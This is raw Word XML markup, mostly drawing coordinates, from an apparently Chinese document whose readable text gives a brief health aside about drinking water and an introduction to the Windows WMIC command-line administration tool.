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group style="position:absolute;margin-left:58.874pt;margin-top:454.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9097" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9097;width:82;height:322" coordorigin="1177,9097" coordsize="82,322" path="m1217,9104l1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9104,1217,9105,1217,9105,1217,9105,1217,9105,1217,9105,1217,9106,1217,9106,1217,9106,1217,9107,1217,9107,1217,9107,1217,9108,1217,9108,1217,9109,1217,9109,1217,9110,1217,9111,1217,9111,1217,9112,1217,9113,1217,9113,1217,9114,1217,9115,1217,9116,1217,9117,1217,9118,1217,9119,1217,9120,1217,9121,1217,9122,1217,9123,1217,9125,1217,9126,1217,9127,1217,9129,1217,9130,1217,9132,1217,9133,1217,9135,1217,9137,1217,9138,1217,9140,1217,9142,1217,9144,1217,9146,1217,9148,1217,9150,1217,9153,1217,9155,1217,9157,1217,9160,1217,9162,1217,9165,1217,9167,1217,9170,1217,9173,1217,9176,1217,9179,1217,9182,1217,9185,1217,9188,1217,9191,1217,9195,1217,9198,1217,9202,1217,9205,1217,9209,1217,9213,1217,9217,1217,9221,1217,9225,1217,9229,1217,9233,1217,9238,1217,9242,1217,9247,1217,9252,1217,9256,1217,9261,1217,9266,1217,9271,1217,9276,1217,9282,1217,9287,1217,9293,1217,9298,1217,9304,1217,9310,1217,9316,1217,9322,1217,9328,1217,9334,1217,9341,1217,9347,1217,9354,1217,9361,1217,9367,1217,9374,1217,9382,1217,9389,1217,9396,1217,9404e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:469.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,9397" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:9397;width:82;height:322" coordorigin="1177,9397" coordsize="82,322" path="m1217,9404l1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9404,1217,9405,1217,9405,1217,9405,1217,9405,1217,9405,1217,9406,1217,9406,1217,9406,1217,9407,1217,9407,1217,9407,1217,9408,1217,9408,1217,9409,1217,9409,1217,9410,1217,9410,1217,9411,1217,9411,1217,9412,1217,9413,1217,9414,1217,9414,1217,9415,1217,9416,1217,9417,1217,9418,1217,9419,1217,9420,1217,9421,1217,9422,1217,9423,1217,9425,1217,9426,1217,9427,1217,9429,1217,9430,1217,9432,1217,9433,1217,9435,1217,9437,1217,9438,1217,9440,1217,9442,1217,9444,1217,9446,1217,9448,1217,9450,1217,9453,1217,9455,1217,9457,1217,9460,1217,9462,1217,9465,1217,9467,1217,9470,1217,9473,1217,9476,1217,9479,1217,9482,1217,9485,1217,9488,1217,9492,1217,9495,1217,9498,1217,9502,1217,9506,1217,9509,1217,9513,1217,9517,1217,9521,1217,9525,1217,9529,1217,9534,1217,9538,1217,9542,1217,9547,1217,9552,1217,9556,1217,9561,1217,9566,1217,9571,1217,9577,1217,9582,1217,9587,1217,9593,1217,9598,1217,9604,1217,9610,1217,9616,1217,9622,1217,9628,1217,9634,1217,9641,1217,9647,1217,9654,1217,9661,1217,9668,1217,9675,1217,9682,1217,9689,1217,9696,1217,9704e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:547.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,10957" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:10957;width:82;height:322" coordorigin="1177,10957" coordsize="82,322" path="m1217,10965l1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10965,1217,10966,1217,10966,1217,10966,1217,10966,1217,10966,1217,10967,1217,10967,1217,10967,1217,10968,1217,10968,1217,10968,1217,10969,1217,10969,1217,10970,1217,10970,1217,10971,1217,10972,1217,10972,1217,10973,1217,10974,1217,10974,1217,10975,1217,10976,1217,10977,1217,10978,1217,10979,1217,10980,1217,10981,1217,10982,1217,10983,1217,10984,1217,10985,1217,10987,1217,10988,1217,10990,1217,10991,1217,10993,1217,10994,1217,10996,1217,10998,1217,10999,1217,11001,1217,11003,1217,11005,1217,11007,1217,11009,1217,11011,1217,11013,1217,11016,1217,11018,1217,11021,1217,11023,1217,11026,1217,11028,1217,11031,1217,11034,1217,11037,1217,11040,1217,11043,1217,11046,1217,11049,1217,11052,1217,11056,1217,11059,1217,11063,1217,11066,1217,11070,1217,11074,1217,11078,1217,11082,1217,11086,1217,11090,1217,11094,1217,11099,1217,11103,1217,11108,1217,11112,1217,11117,1217,11122,1217,11127,1217,11132,1217,11137,1217,11143,1217,11148,1217,11154,1217,11159,1217,11165,1217,11171,1217,11177,1217,11183,1217,11189,1217,11195,1217,11202,1217,11208,1217,11215,1217,11222,1217,11228,1217,11235,1217,11243,1217,11250,1217,11257,1217,11265e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:562.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,11257" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:11257;width:82;height:322" coordorigin="1177,11257" coordsize="82,322" path="m1217,11265l1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11265,1217,11266,1217,11266,1217,11266,1217,11266,1217,11266,1217,11267,1217,11267,1217,11267,1217,11267,1217,11268,1217,11268,1217,11269,1217,11269,1217,11269,1217,11270,1217,11271,1217,11271,1217,11272,1217,11272,1217,11273,1217,11274,1217,11274,1217,11275,1217,11276,1217,11277,1217,11278,1217,11279,1217,11280,1217,11281,1217,11282,1217,11283,1217,11284,1217,11286,1217,11287,1217,11288,1217,11290,1217,11291,1217,11293,1217,11294,1217,11296,1217,11298,1217,11299,1217,11301,1217,11303,1217,11305,1217,11307,1217,11309,1217,11311,1217,11314,1217,11316,1217,11318,1217,11321,1217,11323,1217,11326,1217,11328,1217,11331,1217,11334,1217,11337,1217,11340,1217,11343,1217,11346,1217,11349,1217,11352,1217,11356,1217,11359,1217,11363,1217,11367,1217,11370,1217,11374,1217,11378,1217,11382,1217,11386,1217,11390,1217,11395,1217,11399,1217,11403,1217,11408,1217,11413,1217,11417,1217,11422,1217,11427,1217,11432,1217,11437,1217,11443,1217,11448,1217,11454,1217,11459,1217,11465,1217,11471,1217,11477,1217,11483,1217,11489,1217,11495,1217,11502,1217,11508,1217,11515,1217,11522,1217,11529,1217,11536,1217,11543,1217,11550,1217,11557,1217,11565e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:746.350pt;width:0.0pt;height:95.649pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,14927" coordsize="0,1912">
        <v:shape style="position:absolute;left:10402;top:14927;width:0;height:1912" coordorigin="10402,14927" coordsize="0,1912" path="m10402,14927l10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14927,10402,14928,10402,14928,10402,14928,10402,14929,10402,14930,10402,14930,10402,14931,10402,14932,10402,14933,10402,14934,10402,14936,10402,14937,10402,14939,10402,14940,10402,14942,10402,14944,10402,14946,10402,14949,10402,14951,10402,14954,10402,14957,10402,14960,10402,14964,10402,14967,10402,14971,10402,14975,10402,14979,10402,14984,10402,14989,10402,14994,10402,14999,10402,15005,10402,15011,10402,15017,10402,15023,10402,15030,10402,15037,10402,15044,10402,15052,10402,15060,10402,15068,10402,15077,10402,15086,10402,15096,10402,15105,10402,15115,10402,15126,10402,15137,10402,15148,10402,15160,10402,15172,10402,15184,10402,15197,10402,15210,10402,15224,10402,15238,10402,15253,10402,15268,10402,15283,10402,15299,10402,15316,10402,15333,10402,15350,10402,15368,10402,15387,10402,15405,10402,15425,10402,15445,10402,15465,10402,15486,10402,15508,10402,15530,10402,15552,10402,15576,10402,15599,10402,15624,10402,15649,10402,15674,10402,15700,10402,15727,10402,15754,10402,15782,10402,15810,10402,15840,10402,15869,10402,15900,10402,15931,10402,15963,10402,15995,10402,16028,10402,16062,10402,16096,10402,16131,10402,16167,10402,16203,10402,16241,10402,16279,10402,16317,10402,16357,10402,16397,10402,16437,10402,16479,10402,16521,10402,16564,10402,16608,10402,16653,10402,16698,10402,16745,10402,16792,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:744.874pt;width:450.125pt;height:20.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,14897" coordsize="9002,402">
        <v:shape style="position:absolute;left:1477;top:14897;width:9002;height:402" coordorigin="1477,14897" coordsize="9002,402" path="m1510,14927l1510,14927,1510,14927,1510,14927,1510,14927,1510,14927,1510,14927,1511,14927,1512,14927,1512,14927,1514,14927,1515,14927,1517,14927,1519,14927,1521,14927,1524,14927,1528,14927,1532,14927,1536,14927,1541,14927,1546,14927,1552,14927,1559,14927,1566,14927,1575,14927,1583,14927,1593,14927,1603,14927,1615,14927,1627,14927,1640,14927,1654,14927,1668,14927,1684,14927,1701,14927,1719,14927,1738,14927,1758,14927,1780,14927,1802,14927,1826,14927,1851,14927,1877,14927,1904,14927,1933,14927,1963,14927,1995,14927,2028,14927,2063,14927,2099,14927,2136,14927,2175,14927,2216,14927,2259,14927,2303,14927,2348,14927,2396,14927,2445,14927,2496,14927,2549,14927,2604,14927,2660,14927,2719,14927,2779,14927,2841,14927,2906,14927,2972,14927,3041,14927,3112,14927,3184,14927,3259,14927,3336,14927,3416,14927,3498,14927,3582,14927,3668,14927,3757,14927,3848,14927,3941,14927,4037,14927,4136,14927,4236,14927,4340,14927,4446,14927,4555,14927,4666,14927,4780,14927,4897,14927,5017,14927,5139,14927,5264,14927,5392,14927,5523,14927,5657,14927,5793,14927,5933,14927,6076,14927,6222,14927,6370,14927,6522,14927,6677,14927,6835,14927,6997,14927,7161,14927,7329,14927,7500,14927,7675,14927,7853,14927,8034,14927,8219,14927,8407,14927,8598,14927,8793,14927,8992,14927,9194,14927,9400,14927,9609,14927,9823,14927,10039,14927,10260,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14927,10484,14928,10484,14928,10484,14928,10484,14928,10484,14929,10484,14929,10484,14929,10484,14930,10484,14930,10484,14931,10484,14931,10484,14932,10484,14932,10484,14933,10484,14933,10484,14934,10484,14935,10484,14936,10484,14936,10484,14937,10484,14938,10484,14939,10484,14940,10484,14941,10484,14942,10484,14944,10484,14945,10484,14946,10484,14948,10484,14949,10484,14951,10484,14952,10484,14954,10484,14955,10484,14957,10484,14959,10484,14961,10484,14963,10484,14965,10484,14967,10484,14969,10484,14972,10484,14974,10484,14977,10484,14979,10484,14982,10484,14984,10484,14987,10484,14990,10484,14993,10484,14996,10484,14999,10484,15003,10484,15006,10484,15009,10484,15013,10484,15017,10484,15020,10484,15024,10484,15028,10484,15032,10484,15036,10484,15041,10484,15045,10484,15050,10484,15054,10484,15059,10484,15064,10484,15069,10484,15074,10484,15079,10484,15084,10484,15090,10484,15095,10484,15101,10484,15107,10484,15113,10484,15119,10484,15125,10484,15131,10484,15138,10484,15144,10484,15151,10484,15158,10484,15165,10484,15172,10484,15180,10484,15187,10484,15195,10484,15202,10484,15210,10484,15218,10484,15226,10484,15235,10484,15243,10484,15252,10484,15261,10484,15270,10484,15279,10484,15288,10484,15297,10484,15307,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10483,15317,10482,15317,10482,15317,10480,15317,10479,15317,10477,15317,10475,15317,10473,15317,10470,15317,10466,15317,10462,15317,10458,15317,10453,15317,10448,15317,10442,15317,10435,15317,10428,15317,10419,15317,10411,15317,10401,15317,10391,15317,10379,15317,10367,15317,10354,15317,10340,15317,10326,15317,10310,15317,10293,15317,10275,15317,10256,15317,10236,15317,10215,15317,10192,15317,10168,15317,10143,15317,10117,15317,10090,15317,10061,15317,10031,15317,9999,15317,9966,15317,9931,15317,9895,15317,9858,15317,9819,15317,9778,15317,9735,15317,9691,15317,9646,15317,9598,15317,9549,15317,9498,15317,9445,15317,9391,15317,9334,15317,9275,15317,9215,15317,9153,15317,9088,15317,9022,15317,8953,15317,8883,15317,8810,15317,8735,15317,8658,15317,8578,15317,8497,15317,8413,15317,8326,15317,8238,15317,8146,15317,8053,15317,7957,15317,7859,15317,7758,15317,7654,15317,7548,15317,7439,15317,7328,15317,7214,15317,7097,15317,6977,15317,6855,15317,6730,15317,6602,15317,6471,15317,6337,15317,6201,15317,6061,15317,5918,15317,5773,15317,5624,15317,5472,15317,5317,15317,5159,15317,4997,15317,4833,15317,4665,15317,4494,15317,4319,15317,4141,15317,3960,15317,3776,15317,3587,15317,3396,15317,3201,15317,3002,15317,2800,15317,2594,15317,2385,15317,2172,15317,1955,15317,1734,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15316,1510,15315,1510,15315,1510,15315,1510,15315,1510,15314,1510,15314,1510,15314,1510,15313,1510,15313,1510,15312,1510,15312,1510,15311,1510,15310,1510,15310,1510,15309,1510,15308,1510,15308,1510,15307,1510,15306,1510,15305,1510,15304,1510,15303,1510,15302,1510,15301,1510,15300,1510,15298,1510,15297,1510,15296,1510,15294,1510,15293,1510,15291,1510,15289,1510,15288,1510,15286,1510,15284,1510,15282,1510,15280,1510,15278,1510,15276,1510,15274,1510,15272,1510,15269,1510,15267,1510,15264,1510,15262,1510,15259,1510,15256,1510,15253,1510,15250,1510,15247,1510,15244,1510,15241,1510,15237,1510,15234,1510,15230,1510,15227,1510,15223,1510,15219,1510,15215,1510,15211,1510,15207,1510,15203,1510,15198,1510,15194,1510,15189,1510,15184,1510,15179,1510,15175,1510,15169,1510,15164,1510,15159,1510,15153,1510,15148,1510,15142,1510,15136,1510,15130,1510,15124,1510,15118,1510,15112,1510,15105,1510,15099,1510,15092,1510,15085,1510,15078,1510,15071,1510,15064,1510,15056,1510,15049,1510,15041,1510,15033,1510,15025,1510,15017,1510,15009,1510,15000,1510,14991,1510,14983,1510,14974,1510,14965,1510,14955,1510,14946,1510,14936,1510,14927e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:744.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:763.874pt;width:450.125pt;height:18.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,15277" coordsize="9002,362">
        <v:shape style="position:absolute;left:1477;top:15277;width:9002;height:362" coordorigin="1477,15277" coordsize="9002,362" path="m1510,15317l1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1510,15317,1511,15317,1512,15317,1512,15317,1514,15317,1515,15317,1517,15317,1519,15317,1521,15317,1524,15317,1528,15317,1532,15317,1536,15317,1541,15317,1546,15317,1552,15317,1559,15317,1566,15317,1575,15317,1583,15317,1593,15317,1603,15317,1615,15317,1627,15317,1640,15317,1654,15317,1668,15317,1684,15317,1701,15317,1719,15317,1738,15317,1758,15317,1780,15317,1802,15317,1826,15317,1851,15317,1877,15317,1904,15317,1933,15317,1963,15317,1995,15317,2028,15317,2063,15317,2099,15317,2136,15317,2175,15317,2216,15317,2259,15317,2303,15317,2348,15317,2396,15317,2445,15317,2496,15317,2549,15317,2604,15317,2660,15317,2719,15317,2779,15317,2841,15317,2906,15317,2972,15317,3041,15317,3112,15317,3184,15317,3259,15317,3336,15317,3416,15317,3498,15317,3582,15317,3668,15317,3757,15317,3848,15317,3941,15317,4037,15317,4136,15317,4236,15317,4340,15317,4446,15317,4555,15317,4666,15317,4780,15317,4897,15317,5017,15317,5139,15317,5264,15317,5392,15317,5523,15317,5657,15317,5793,15317,5933,15317,6076,15317,6222,15317,6370,15317,6522,15317,6677,15317,6835,15317,6997,15317,7161,15317,7329,15317,7500,15317,7675,15317,7853,15317,8034,15317,8219,15317,8407,15317,8598,15317,8793,15317,8992,15317,9194,15317,9400,15317,9609,15317,9823,15317,10039,15317,10260,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15317,10484,15318,10484,15318,10484,15318,10484,15318,10484,15318,10484,15319,10484,15319,10484,15319,10484,15319,10484,15320,10484,15320,10484,15321,10484,15321,10484,15321,10484,15322,10484,15323,10484,15323,10484,15324,10484,15324,10484,15325,10484,15326,10484,15327,10484,15327,10484,15328,10484,15329,10484,15330,10484,15331,10484,15332,10484,15333,10484,15335,10484,15336,10484,15337,10484,15338,10484,15340,10484,15341,10484,15343,10484,15344,10484,15346,10484,15348,10484,15349,10484,15351,10484,15353,10484,15355,10484,15357,10484,15359,10484,15361,10484,15363,10484,15366,10484,15368,10484,15371,10484,15373,10484,15376,10484,15378,10484,15381,10484,15384,10484,15387,10484,15390,10484,15393,10484,15396,10484,15399,10484,15403,10484,15406,10484,15410,10484,15413,10484,15417,10484,15421,10484,15425,10484,15429,10484,15433,10484,15437,10484,15441,10484,15446,10484,15450,10484,15455,10484,15460,10484,15464,10484,15469,10484,15474,10484,15479,10484,15485,10484,15490,10484,15496,10484,15501,10484,15507,10484,15513,10484,15519,10484,15525,10484,15531,10484,15537,10484,15544,10484,15550,10484,15557,10484,15564,10484,15570,10484,15577,10484,15585,10484,15592,10484,15599,10484,15607,10484,15615,10484,15623,10484,15631,10484,15639,10484,15647,10484,15647,10484,15647,10484,15647,10484,15647,10484,15647,10484,15647,10483,15647,10482,15647,10482,15647,10480,15647,10479,15647,10477,15647,10475,15647,10473,15647,10470,15647,10466,15647,10462,15647,10458,15647,10453,15647,10448,15647,10442,15647,10435,15647,10428,15647,10419,15647,10411,15647,10401,15647,10391,15647,10379,15647,10367,15647,10354,15647,10340,15647,10326,15647,10310,15647,10293,15647,10275,15647,10256,15647,10236,15647,10215,15647,10192,15647,10168,15647,10143,15647,10117,15647,10090,15647,10061,15647,10031,15647,9999,15647,9966,15647,9931,15647,9895,15647,9858,15647,9819,15647,9778,15647,9735,15647,9691,15647,9646,15647,9598,15647,9549,15647,9498,15647,9445,15647,9391,15647,9334,15647,9275,15647,9215,15647,9153,15647,9088,15647,9022,15647,8953,15647,8883,15647,8810,15647,8735,15647,8658,15647,8578,15647,8497,15647,8413,15647,8326,15647,8238,15647,8146,15647,8053,15647,7957,15647,7859,15647,7758,15647,7654,15647,7548,15647,7439,15647,7328,15647,7214,15647,7097,15647,6977,15647,6855,15647,6730,15647,6602,15647,6471,15647,6337,15647,6201,15647,6061,15647,5918,15647,5773,15647,5624,15647,5472,15647,5317,15647,5159,15647,4997,15647,4833,15647,4665,15647,4494,15647,4319,15647,4141,15647,3960,15647,3776,15647,3587,15647,3396,15647,3201,15647,3002,15647,2800,15647,2594,15647,2385,15647,2172,15647,1955,15647,1734,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15647,1510,15646,1510,15646,1510,15646,1510,15646,1510,15646,1510,15646,1510,15646,1510,15645,1510,15645,1510,15645,1510,15645,1510,15644,1510,15644,1510,15643,1510,15643,1510,15643,1510,15642,1510,15642,1510,15641,1510,15640,1510,15640,1510,15639,1510,15638,1510,15638,1510,15637,1510,15636,1510,15635,1510,15634,1510,15633,1510,15632,1510,15631,1510,15630,1510,15629,1510,15628,1510,15627,1510,15625,1510,15624,1510,15622,1510,15621,1510,15619,1510,15618,1510,15616,1510,15614,1510,15612,1510,15611,1510,15609,1510,15607,1510,15605,1510,15602,1510,15600,1510,15598,1510,15596,1510,15593,1510,15591,1510,15588,1510,15585,1510,15583,1510,15580,1510,15577,1510,15574,1510,15571,1510,15567,1510,15564,1510,15561,1510,15557,1510,15554,1510,15550,1510,15547,1510,15543,1510,15539,1510,15535,1510,15531,1510,15527,1510,15522,1510,15518,1510,15513,1510,15509,1510,15504,1510,15499,1510,15494,1510,15489,1510,15484,1510,15479,1510,15474,1510,15468,1510,15462,1510,15457,1510,15451,1510,15445,1510,15439,1510,15433,1510,15426,1510,15420,1510,15414,1510,15407,1510,15400,1510,15393,1510,15386,1510,15379,1510,15372,1510,15364,1510,15357,1510,15349,1510,15341,1510,15333,1510,15325,1510,15317e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:764.874pt;width:2.125pt;height:17.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,15297" coordsize="42,342">
        <v:shape style="position:absolute;left:1477;top:15297;width:42;height:342" coordorigin="1477,15297" coordsize="42,342" path="m1517,15317l1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15317,1517,15318,1517,15318,1517,15318,1517,15318,1517,15318,1517,15319,1517,15319,1517,15319,1517,15319,1517,15320,1517,15320,1517,15321,1517,15321,1517,15321,1517,15322,1517,15323,1517,15323,1517,15324,1517,15324,1517,15325,1517,15326,1517,15327,1517,15327,1517,15328,1517,15329,1517,15330,1517,15331,1517,15332,1517,15333,1517,15335,1517,15336,1517,15337,1517,15338,1517,15340,1517,15341,1517,15343,1517,15344,1517,15346,1517,15348,1517,15349,1517,15351,1517,15353,1517,15355,1517,15357,1517,15359,1517,15361,1517,15363,1517,15366,1517,15368,1517,15371,1517,15373,1517,15376,1517,15378,1517,15381,1517,15384,1517,15387,1517,15390,1517,15393,1517,15396,1517,15399,1517,15403,1517,15406,1517,15410,1517,15413,1517,15417,1517,15421,1517,15425,1517,15429,1517,15433,1517,15437,1517,15441,1517,15446,1517,15450,1517,15455,1517,15460,1517,15464,1517,15469,1517,15474,1517,15479,1517,15485,1517,15490,1517,15496,1517,15501,1517,15507,1517,15513,1517,15519,1517,15525,1517,15531,1517,15537,1517,15544,1517,15550,1517,15557,1517,15564,1517,15570,1517,15577,1517,15585,1517,15592,1517,15599,1517,15607,1517,15615,1517,15623,1517,15631,1517,15639,1517,15647e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="4795" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防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肾结石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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风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等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mic简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1193" w:firstLine="483"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMIC扩展WMI（Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> 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Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="25"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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Instrumentation，Windows管理工具）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，提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出</w:t>
      </w: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现之前，如果要管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WMI系统，必须使用一些专门的WMI应用，例如SMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，或者使用WMI的脚本编程API，或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者使用象CIM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t> 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Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本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语言，或者不掌握W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MI名称空间的基本知识，要用WMI管理系统是很困难的。WMIC改变</w:t>
      </w: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了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这种情况。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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1223" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Wmic.exe所在路径已被系统添加PATH环境变量中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，因此，Wmic命令可识别，需注</w:t>
      </w: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意x86，x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64位的Wmic调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
